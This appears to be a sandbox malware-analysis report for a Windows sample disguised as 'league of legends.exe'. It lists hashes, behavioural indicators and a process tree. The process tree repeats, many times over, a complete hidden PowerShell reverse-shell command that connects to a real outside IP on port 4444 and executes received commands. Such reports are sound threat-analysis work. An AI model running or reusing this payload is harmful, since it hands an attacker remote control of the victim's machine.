Analysis
-
max time kernel
296s -
max time network
195s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
25/05/2024, 23:29
Behavioral task
behavioral1
Sample
league of legends.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
league of legends.exe
Resource
win10v2004-20240426-en
General
-
Target
league of legends.exe
-
Size
5.2MB
-
MD5
52c0e4218367789067b5fd8c7d13b5c9
-
SHA1
10a0b1b53e0447875404a0a4d813e02d78c1089e
-
SHA256
f29bb95cd3cc9507c6d056c5223ec9bf521c52e961a11f9ca779c430a6fb1b14
-
SHA512
c0b73db1a1bfa13e8b45d8291435b14a2d68b5f9854bef895ef1f3aa930d880ee76abf02a0a85968f7ba154915d6ae091836c1f72f5c7b26a79b007c4a120219
-
SSDEEP
98304:knwrufKIDTGpzoLLJ3TbwaVvrZE0I7yoFQK15W8ASLmbNYJERw1jrTHD1DlrY31:knwruiIm9onJ5hrZEnyiU8AdZYJERur0
Malware Config
Signatures
-
Loads dropped DLL 4 IoCs
pid Process 2936 league of legends.exe 2936 league of legends.exe 2936 league of legends.exe 2936 league of legends.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3624 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 528 wrote to memory of 2936 528 league of legends.exe 86 PID 528 wrote to memory of 2936 528 league of legends.exe 86 PID 2936 wrote to memory of 3196 2936 league of legends.exe 88 PID 2936 wrote to memory of 3196 2936 league of legends.exe 88 PID 2936 wrote to memory of 1280 2936 league of legends.exe 99 PID 2936 wrote to memory of 1280 2936 league of legends.exe 99 PID 2936 wrote to memory of 2584 2936 league of legends.exe 103 PID 2936 wrote to memory of 2584 2936 league of legends.exe 103 PID 2936 wrote to memory of 4092 2936 league of legends.exe 104 PID 2936 wrote to memory of 4092 2936 league of legends.exe 104 PID 2936 wrote to memory of 4324 2936 league of legends.exe 105 PID 2936 wrote to memory of 4324 2936 league of legends.exe 105 PID 2936 wrote to memory of 668 2936 league of legends.exe 106 PID 2936 wrote to memory of 668 2936 league of legends.exe 106 PID 2936 wrote to memory of 3096 2936 league of legends.exe 108 PID 2936 wrote to memory of 3096 2936 league of legends.exe 108 PID 2936 wrote to memory of 5108 2936 league of legends.exe 111 PID 2936 wrote to memory of 5108 2936 league of legends.exe 111 PID 2936 wrote to memory of 1340 2936 league of legends.exe 112 PID 2936 wrote to memory of 1340 2936 league of legends.exe 112 PID 2936 wrote to memory of 3864 2936 league of legends.exe 113 PID 2936 wrote to memory of 3864 2936 league of legends.exe 113 PID 2936 wrote to memory of 4584 2936 league of legends.exe 114 PID 2936 wrote to memory of 4584 2936 league of legends.exe 114 PID 2936 wrote to memory of 2476 2936 league of legends.exe 115 PID 2936 wrote to memory of 2476 2936 league of legends.exe 115 PID 2936 wrote to memory of 2380 2936 league of legends.exe 116 PID 2936 wrote to memory of 2380 2936 league of legends.exe 116 PID 2936 wrote to memory of 4068 2936 league of legends.exe 118 PID 2936 wrote to memory of 4068 2936 league of legends.exe 118 PID 2936 wrote to memory of 812 2936 league of legends.exe 119 PID 2936 wrote to memory of 812 2936 league of legends.exe 119 PID 2936 wrote to memory of 2376 2936 league of legends.exe 120 PID 2936 wrote to memory of 2376 2936 league of legends.exe 120 PID 2936 wrote to memory of 4588 2936 league of legends.exe 121 PID 2936 wrote to memory of 4588 2936 league of legends.exe 121 PID 2936 wrote to memory of 1536 2936 league of legends.exe 122 PID 2936 wrote to memory of 1536 2936 league of legends.exe 122 PID 2936 wrote to memory of 1088 2936 league of legends.exe 123 PID 2936 wrote to memory of 1088 2936 league of legends.exe 123 PID 2936 wrote to memory of 3584 2936 league of legends.exe 124 PID 2936 wrote to memory of 3584 2936 league of legends.exe 124 PID 2936 wrote to memory of 4040 2936 league of legends.exe 131 PID 2936 wrote to memory of 4040 2936 league of legends.exe 131 PID 2936 wrote to memory of 2008 2936 league of legends.exe 132 PID 2936 wrote to memory of 2008 2936 league of legends.exe 132 PID 2936 wrote to memory of 4600 2936 league of legends.exe 133 PID 2936 wrote to memory of 4600 2936 league of legends.exe 133 PID 2936 wrote to memory of 4556 2936 league of legends.exe 134 PID 2936 wrote to memory of 4556 2936 league of legends.exe 134 PID 2936 wrote to memory of 2888 2936 league of legends.exe 135 PID 2936 wrote to memory of 2888 2936 league of legends.exe 135 PID 2936 wrote to memory of 1260 2936 league of legends.exe 136 PID 2936 wrote to memory of 1260 2936 league of legends.exe 136 PID 2936 wrote to memory of 2564 2936 league of legends.exe 137 PID 2936 wrote to memory of 2564 2936 league of legends.exe 137 PID 2936 wrote to memory of 1188 2936 league of legends.exe 140 PID 2936 wrote to memory of 1188 2936 league of legends.exe 140 PID 2936 wrote to memory of 3152 2936 league of legends.exe 141 PID 2936 wrote to memory of 3152 2936 league of legends.exe 141 PID 2936 wrote to memory of 1248 2936 league of legends.exe 142 PID 2936 wrote to memory of 1248 2936 league of legends.exe 142 PID 2936 wrote to memory of 1664 2936 league of legends.exe 143 PID 2936 wrote to memory of 1664 2936 league of legends.exe 143
Processes
-
C:\Users\Admin\AppData\Local\Temp\league of legends.exe"C:\Users\Admin\AppData\Local\Temp\league of legends.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Users\Admin\AppData\Local\Temp\league of legends.exe"C:\Users\Admin\AppData\Local\Temp\league of legends.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:668
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4588
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2008
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4556
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2888
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3152
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1248
-
-
